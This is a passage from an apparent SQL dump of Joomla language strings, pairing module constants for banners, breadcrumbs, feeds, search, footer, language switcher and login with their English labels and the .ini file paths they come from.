Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2272,'MOD_BANNERS_FIELD_HEADER_DESC','Text or HTML to display before the group of banners.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2273,'MOD_BANNERS_FIELD_HEADER_LABEL','Header Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2274,'MOD_BANNERS_FIELD_RANDOMISE_DESC','Randomise the ordering of the banners.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2275,'MOD_BANNERS_FIELD_RANDOMISE_LABEL','Randomise','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2276,'MOD_BANNERS_FIELD_TAG_DESC','Banner is selected by matching the banner meta keywords to the current document meta keywords.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2277,'MOD_BANNERS_FIELD_TAG_LABEL','Search by Meta Keyword','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2278,'MOD_BANNERS_FIELD_TARGET_DESC','Target window when the link is selected.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2279,'MOD_BANNERS_FIELD_TARGET_LABEL','Target','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2280,'MOD_BANNERS_VALUE_STICKYORDERING','Pinned, Ordering','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2281,'MOD_BANNERS_VALUE_STICKYRANDOMISE','Pinned, Randomise','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2282,'MOD_BANNERS_XML_DESCRIPTION','The Banner Module displays the active Banners from the Component.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.ini'),(2283,'MOD_BANNERS','Banners','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.sys.ini'),(2284,'MOD_BANNERS_XML_DESCRIPTION','The Banner Module displays the active Banners from the Component.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.sys.ini'),(2285,'MOD_BANNERS_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_banners.sys.ini'),(2286,'MOD_BREADCRUMBS','Breadcrumbs','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2287,'MOD_BREADCRUMBS_FIELD_HOMETEXT_DESC','This text will be shown as Home entry. If the field is left empty, it will use the default value from the mod_breadcrumbs.ini language file.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2288,'MOD_BREADCRUMBS_FIELD_HOMETEXT_LABEL','Text for Home Entry','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2289,'MOD_BREADCRUMBS_FIELD_SEPARATOR_DESC','A text separator.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2290,'MOD_BREADCRUMBS_FIELD_SEPARATOR_LABEL','Text Separator','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2291,'MOD_BREADCRUMBS_FIELD_SHOWHERE_DESC','Show or hide "You are here" text in the pathway.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2292,'MOD_BREADCRUMBS_FIELD_SHOWHERE_LABEL','Show "You are here"','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2293,'MOD_BREADCRUMBS_FIELD_SHOWHOME_DESC','Show or hide the Home element in the pathway.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2294,'MOD_BREADCRUMBS_FIELD_SHOWHOME_LABEL','Show Home','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2295,'MOD_BREADCRUMBS_FIELD_SHOWLAST_DESC','Show or hide the last element in the pathway.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2296,'MOD_BREADCRUMBS_FIELD_SHOWLAST_LABEL','Show Last','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2297,'MOD_BREADCRUMBS_HERE','You are here: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2298,'MOD_BREADCRUMBS_HOME','Home','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2299,'MOD_BREADCRUMBS_XML_DESCRIPTION','This module displays the Breadcrumbs.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.ini'),(2300,'MOD_BREADCRUMBS','Breadcrumbs','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.sys.ini'),(2301,'MOD_BREADCRUMBS_XML_DESCRIPTION','This module displays the Breadcrumbs.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.sys.ini'),(2302,'MOD_BREADCRUMBS_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_breadcrumbs.sys.ini'),(2303,'MOD_CUSTOM','Custom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.ini'),(2304,'MOD_CUSTOM_FIELD_PREPARE_CONTENT_DESC','Optionally prepare the content with the Joomla Content Plugins.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.ini'),(2305,'MOD_CUSTOM_FIELD_PREPARE_CONTENT_LABEL','Prepare Content','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.ini'),(2306,'MOD_CUSTOM_XML_DESCRIPTION','This module allows you to create your own Module using a WYSIWYG editor.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.ini'),(2307,'MOD_CUSTOM_FIELD_BACKGROUNDIMAGE_LABEL','Select a Background Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.ini'),(2308,'MOD_BACKGROUNDIMAGE_FIELD_LOGO_DESC','Select or upload an image that will automatically be inserted as an inline style for the wrapping div element.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.ini'),(2309,'MOD_CUSTOM','Custom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.sys.ini'),(2310,'MOD_CUSTOM_XML_DESCRIPTION','This module allows you to create your own Module using a WYSIWYG editor.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.sys.ini'),(2311,'MOD_CUSTOM_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_custom.sys.ini'),(2312,'MOD_FEED','Feed Display','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2313,'MOD_FEED_ERR_CACHE','Please make cache folder writeable.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2314,'MOD_FEED_ERR_FEED_NOT_RETRIEVED','Feed not found.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2315,'MOD_FEED_ERR_NO_URL','No feed URL specified.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2316,'MOD_FEED_FIELD_DATE_DESC','Show the publication date of the feed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2317,'MOD_FEED_FIELD_DATE_LABEL','Feed Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2318,'MOD_FEED_FIELD_DESCRIPTION_DESC','Show the description text for the entire feed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2319,'MOD_FEED_FIELD_DESCRIPTION_LABEL','Feed Description','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2320,'MOD_FEED_FIELD_IMAGE_DESC','Show the image associated with the entire feed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2321,'MOD_FEED_FIELD_IMAGE_LABEL','Feed Image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2322,'MOD_FEED_FIELD_ITEMDATE_DESC','Show the publication date of individual RSS Items.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2323,'MOD_FEED_FIELD_ITEMDATE_LABEL','Publication Date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2324,'MOD_FEED_FIELD_ITEMDESCRIPTION_DESC','Show the description or intro text of individual RSS items.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2325,'MOD_FEED_FIELD_ITEMDESCRIPTION_LABEL','Item Description','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2326,'MOD_FEED_FIELD_ITEMS_DESC','Enter number of RSS items to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2327,'MOD_FEED_FIELD_ITEMS_LABEL','Feed Items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2328,'MOD_FEED_FIELD_RSSTITLE_DESC','Display news feed title.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2329,'MOD_FEED_FIELD_RSSTITLE_LABEL','Feed Title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2330,'MOD_FEED_FIELD_RSSURL_DESC','Enter the URL of the RSS/RDF/ATOM feed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2331,'MOD_FEED_FIELD_RSSURL_LABEL','Feed URL','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2332,'MOD_FEED_FIELD_RTL_DESC','Display feed in RTL direction.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2333,'MOD_FEED_FIELD_RTL_LABEL','RTL Feed','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2334,'MOD_FEED_FIELD_WORDCOUNT_DESC','Allows you to limit the amount of visible Item description text. 0 will show all the text.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2335,'MOD_FEED_FIELD_WORDCOUNT_LABEL','Word Count','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2336,'MOD_FEED_XML_DESCRIPTION','This module allows the displaying of a syndicated feed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.ini'),(2337,'MOD_FEED','Feed Display','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.sys.ini'),(2338,'MOD_FEED_XML_DESCRIPTION','This module allows the displaying of a syndicated feed.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.sys.ini'),(2339,'MOD_FEED_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_feed.sys.ini'),(2340,'COM_FINDER_FILTER_BRANCH_LABEL','Search by %s','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2341,'COM_FINDER_FILTER_SELECT_ALL_LABEL','Search All','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2342,'COM_FINDER_ADVANCED_SEARCH','Advanced Search','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2343,'COM_FINDER_SELECT_SEARCH_FILTER','- No Filter -','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2344,'MOD_FINDER','Smart Search','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2345,'MOD_FINDER_CONFIG_OPTION_BOTTOM','Bottom','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2346,'MOD_FINDER_CONFIG_OPTION_TOP','Top','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2347,'MOD_FINDER_FIELDSET_ADVANCED_ALT_DESCRIPTION','An alternative label for the search field.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2348,'MOD_FINDER_FIELDSET_ADVANCED_ALT_LABEL','Alternative Label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2349,'MOD_FINDER_FIELDSET_ADVANCED_BUTTON_POS_DESCRIPTION','The position of the search button relative to the search field.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2350,'MOD_FINDER_FIELDSET_ADVANCED_BUTTON_POS_LABEL','Button Position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2351,'MOD_FINDER_FIELDSET_ADVANCED_FIELD_SIZE_DESCRIPTION','The width of the search field by character length.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2352,'MOD_FINDER_FIELDSET_ADVANCED_FIELD_SIZE_LABEL','Search Field Size','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2353,'MOD_FINDER_FIELDSET_ADVANCED_LABEL_POS_DESCRIPTION','The position of the search label relative to the search field.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2354,'MOD_FINDER_FIELDSET_ADVANCED_LABEL_POS_LABEL','Label Position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2355,'MOD_FINDER_FIELDSET_ADVANCED_SETITEMID_DESCRIPTION','Assign an ItemID by selecting a menu item in the list for the display of the search results if there is no com_finder menu item and a specific display is desired. If you do not know what this means, you may not need it.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2356,'MOD_FINDER_FIELDSET_ADVANCED_SETITEMID_LABEL','Set ItemID','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2357,'MOD_FINDER_FIELDSET_ADVANCED_SHOW_BUTTON_DESCRIPTION','Show or hide a button for the search form.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2358,'MOD_FINDER_FIELDSET_ADVANCED_SHOW_BUTTON_LABEL','Search Button','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2359,'MOD_FINDER_FIELDSET_ADVANCED_SHOW_LABEL_DESCRIPTION','Show or hide a label for the search field.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2360,'MOD_FINDER_FIELDSET_ADVANCED_SHOW_LABEL_LABEL','Search Field Label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2361,'MOD_FINDER_FIELDSET_BASIC_AUTOSUGGEST_DESCRIPTION','Show or hide automatic search suggestions.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2362,'MOD_FINDER_FIELDSET_BASIC_AUTOSUGGEST_LABEL','Search Suggestions','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2363,'MOD_FINDER_FIELDSET_BASIC_SEARCHFILTER_DESCRIPTION','Selecting a Search Filter will limit any searches submitted through this module to use the selected filter.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2364,'MOD_FINDER_FIELDSET_BASIC_SEARCHFILTER_LABEL','Search Filter','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2365,'MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_DESCRIPTION','Show or hide advanced search options. If set to Link to Component option creates a Smart Search link which redirects to the smart search view. If set to show, the advanced search options will be displayed inline.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2366,'MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_LABEL','Advanced Search','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2367,'MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_OPTION_LINK','Link to Component','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2368,'MOD_FINDER_FIELD_OPENSEARCH_DESCRIPTION','Some browsers can add support for your site\'s search if this option is enabled.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2369,'MOD_FINDER_FIELD_OPENSEARCH_LABEL','OpenSearch Autodiscovery','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2370,'MOD_FINDER_FIELD_OPENSEARCH_TEXT_DESCRIPTION','Text displayed in supported browsers when adding your site as a search provider.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2371,'MOD_FINDER_FIELD_OPENSEARCH_TEXT_LABEL','OpenSearch title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2372,'MOD_FINDER_SEARCHBUTTON_TEXT','Search','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2373,'MOD_FINDER_SEARCH_BUTTON','Go','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2374,'MOD_FINDER_SEARCH_VALUE','Search ...','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2375,'MOD_FINDER_SELECT_MENU_ITEMID','Select a menu item','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2376,'MOD_FINDER_XML_DESCRIPTION','This is a Smart Search module.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.ini'),(2377,'MOD_FINDER','Smart Search','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.sys.ini'),(2378,'MOD_FINDER_XML_DESCRIPTION','This is a search module for the Smart Search system.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.sys.ini'),(2379,'MOD_FINDER_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_finder.sys.ini'),(2380,'MOD_FOOTER','Footer','/home/smthsmth/public_html/language/en-GB/en-GB.mod_footer.ini'),(2381,'MOD_FOOTER_LINE1','Copyright © %date% %sitename%. All Rights Reserved.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_footer.ini'),(2382,'MOD_FOOTER_LINE2','<a href=\"https://www.joomla.org\">Joomla!</a> is Free Software released under the <a href=\"https://www.gnu.org/licenses/gpl-2.0.html\">GNU General Public License.</a>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_footer.ini'),(2383,'MOD_FOOTER_XML_DESCRIPTION','This module shows the Joomla! copyright information.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_footer.ini'),(2384,'MOD_FOOTER','Footer','/home/smthsmth/public_html/language/en-GB/en-GB.mod_footer.sys.ini'),(2385,'MOD_FOOTER_XML_DESCRIPTION','This module shows the Joomla! copyright information.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_footer.sys.ini'),(2386,'MOD_FOOTER_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_footer.sys.ini'),(2387,'MOD_LANGUAGES','Language Switcher','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2388,'MOD_LANGUAGES_FIELD_ACTIVE_DESC','Display or not the active language. If displayed, the class \'lang-active\' will be added to the element.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2389,'MOD_LANGUAGES_FIELD_ACTIVE_LABEL','Active Language','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2390,'MOD_LANGUAGES_FIELD_CACHING_DESC','Use the global cache setting to cache the content of this module or disable caching for this module.<br />This should be set to \'No caching\' when using Associations.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2391,'MOD_LANGUAGES_FIELD_DROPDOWN_DESC','If set to \'Yes\', the content languages native names will display in a dropdown.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2392,'MOD_LANGUAGES_FIELD_DROPDOWN_LABEL','Use Dropdown','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2393,'MOD_LANGUAGES_FIELD_DROPDOWN_IMAGE_DESC','Add image flags to the dropdown.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2394,'MOD_LANGUAGES_FIELD_DROPDOWN_IMAGE_LABEL','Use Flags For Dropdown','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2395,'MOD_LANGUAGES_FIELD_FOOTER_DESC','This is the text or HTML that is displayed below the language switcher.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2396,'MOD_LANGUAGES_FIELD_FOOTER_LABEL','Post-text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2397,'MOD_LANGUAGES_FIELD_FULL_NAME_DESC','If set to \'Yes\', full content language native names are displayed. If set to \'No\', upper case abbreviations from the content languages URL Language Code are used. Example: EN for English, FR for French.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2398,'MOD_LANGUAGES_FIELD_FULL_NAME_LABEL','Languages Full Names','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2399,'MOD_LANGUAGES_FIELD_HEADER_DESC','This is the text or HTML that is displayed above the language switcher.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2400,'MOD_LANGUAGES_FIELD_HEADER_LABEL','Pre-text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2401,'MOD_LANGUAGES_FIELD_INLINE_DESC','Default is set to \'Yes\', ie to horizontal display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2402,'MOD_LANGUAGES_FIELD_INLINE_LABEL','Horizontal Display','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2403,'MOD_LANGUAGES_FIELD_LINEHEIGHT_DESC','If set to \'Yes\', will decrease the line height when using flags.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2404,'MOD_LANGUAGES_FIELD_LINEHEIGHT_LABEL','Line Height','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2405,'MOD_LANGUAGES_FIELD_MODULE_LAYOUT_DESC','Use a different layout from the supplied module or overrides in the default template.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2406,'MOD_LANGUAGES_FIELD_USEIMAGE_DESC','If set to \'Yes\', will display language choice as image flags. Otherwise will use the content language native names.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2407,'MOD_LANGUAGES_FIELD_USEIMAGE_LABEL','Use Image Flags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2408,'MOD_LANGUAGES_OPTION_DEFAULT_LANGUAGE','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2409,'MOD_LANGUAGES_SPACERDROP_LABEL','<u>If Use Dropdown is set to \'Yes\', <br />the display options below will be ignored</u>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2410,'MOD_LANGUAGES_SPACERNAME_LABEL','<u>If Use Image Flags is set to \'Yes\', <br />the display options below will be ignored</u>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2411,'MOD_LANGUAGES_SPACER_USENAME_LABEL','<u>As \'Use Dropdown\' and \'Use Image Flags\' have been set to \'No\',<br /> the switcher will display language names.</u>','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2412,'MOD_LANGUAGES_XML_DESCRIPTION','This module displays a list of available Content Languages (as defined and published in Language Manager Content tab) for switching between them when you want to use Joomla! as a multilingual site. <br />--The plugin \'System - Language Filter\' has to be enabled.--<br />When switching languages and if the item displayed in the page is not associated to another item, the module redirects to the Home page defined for the chosen language.<br />Otherwise, if the parameter is set for the Language filter plugin, it will redirect to the associated item in the language chosen. Thereafter, the navigation will be the one defined for that language. <br />If the plugin <strong>\'System - Language Filter\'</strong> is disabled, this may have unwanted results.<br /><strong>Method:</strong><br />1. Open Language Manager Content tab and make sure the Languages you want to use in contents are published and have a Language Code for the URL as well as prefix for the image used in the module display.<br />2. Create a Home page by assigning a language to a menu item and defining it as Default Home page for each published content language. <br />3. Thereafter, you can assign a language to any Article, Category, Module, News Feed, Web Links in Joomla.<br />4. Make sure the module is published and the plugin is enabled. <br />5. When using associated items, make sure the module is displayed on the relevant pages. <br />6. The way the flags or names of the languages are displayed is defined by the ordering in the Language Manager - Content Languages.<br ><br >If this module is published, it is suggested to publish the Administrator multilingual status module.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.ini'),(2413,'MOD_LANGUAGES','Language Switcher','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.sys.ini'),(2414,'MOD_LANGUAGES_XML_DESCRIPTION','This module displays a list of available Content Languages (as defined and published in Language Manager Content tab) for switching between them when you want to use Joomla! as a multilingual site. <br />--The plugin \'System - Language Filter\' has to be enabled.--<br />When switching languages and if the item displayed in the page is not associated to another item, the module redirects to the Home page defined for the chosen language.<br />Otherwise, if the parameter is set for the Language filter plugin, it will redirect to the associated item in the language chosen. Thereafter, the navigation will be the one defined for that language. <br />If the plugin <strong>\'System - Language Filter\'</strong> is disabled, this may have unwanted results.<br /><strong>Method:</strong><br />1. Open Language Manager Content tab and make sure the Languages you want to use in contents are published and have a Language Code for the URL as well as prefix for the image used in the module display.<br />2. Create a Home page by assigning a language to a menu item and defining it as Default Home page for each published content language. <br />3. Thereafter, you can assign a language to any Article, Category, Module, News Feed, Web Links in Joomla.<br />4. Make sure the module is published and the plugin is enabled. <br />5. When using associated items, make sure the module is displayed on the relevant pages. <br />6. The way the flags or names of the languages are displayed is defined by the ordering in the Language Manager - Content Languages.<br ><br >If this module is published, it is suggested to publish the Administrator multilingual status module.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.sys.ini'),(2415,'MOD_LANGUAGES_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_languages.sys.ini'),(2416,'MOD_LOGIN','Login','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2417,'MOD_LOGIN_FIELD_GREETING_DESC','Show or hide the simple greeting text.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2418,'MOD_LOGIN_FIELD_GREETING_LABEL','Show Greeting','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2419,'MOD_LOGIN_FIELD_LOGIN_REDIRECTURL_DESC','Select or create the page the user will be redirected to after a successful login. The default is to stay on the same page.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2420,'MOD_LOGIN_FIELD_LOGIN_REDIRECTURL_LABEL','Login Redirection Page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2421,'MOD_LOGIN_FIELD_LOGOUT_REDIRECTURL_DESC','Select or create the page the user will be redirected to after ending their current session by logging out. The default is to stay on the same page.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2422,'MOD_LOGIN_FIELD_LOGOUT_REDIRECTURL_LABEL','Logout Redirection Page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2423,'MOD_LOGIN_FIELD_NAME_DESC','Displays name or username after logging in.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2424,'MOD_LOGIN_FIELD_NAME_LABEL','Show Name/Username','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2425,'MOD_LOGIN_FIELD_POST_TEXT_DESC','This is the text or HTML that is displayed below the login form.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2426,'MOD_LOGIN_FIELD_POST_TEXT_LABEL','Post-text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2427,'MOD_LOGIN_FIELD_PRE_TEXT_DESC','This is the text or HTML that is displayed above the login form.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2428,'MOD_LOGIN_FIELD_PRE_TEXT_LABEL','Pre-text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2429,'MOD_LOGIN_FIELD_PROFILE_LABEL','Show Profile Link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2430,'MOD_LOGIN_FIELD_PROFILE_DESC','Show a link to the User Profile page after logging in.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2431,'MOD_LOGIN_FIELD_USESECURE_DESC','Submit encrypted login data using HTTPS (encrypted HTTP connections with the https:// protocol prefix). Note, you must have HTTPS enabled on your server to utilise this option.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2432,'MOD_LOGIN_FIELD_USESECURE_LABEL','Encrypt Login Form','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2433,'MOD_LOGIN_FIELD_USETEXT_DESC','Choose text or icons to display the field labels. Default is icons.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2434,'MOD_LOGIN_FIELD_USETEXT_LABEL','Display Labels','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2435,'MOD_LOGIN_FORGOT_YOUR_PASSWORD','Forgot your password?','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2436,'MOD_LOGIN_FORGOT_YOUR_USERNAME','Forgot your username?','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2437,'MOD_LOGIN_HINAME','Hi %s,','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2438,'MOD_LOGIN_PROFILE','View Profile','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2439,'MOD_LOGIN_REGISTER','Create an account','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2440,'MOD_LOGIN_REMEMBER_ME','Remember Me','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2441,'MOD_LOGIN_VALUE_ICONS','Icons','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2442,'MOD_LOGIN_VALUE_NAME','Name','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2443,'MOD_LOGIN_VALUE_TEXT','Text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2444,'MOD_LOGIN_VALUE_USERNAME','Username','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2445,'MOD_LOGIN_XML_DESCRIPTION','This module displays a username and password login form. It also displays a link to retrieve a forgotten password. If user registration is enabled (in Users > Manage > Options), another link will be 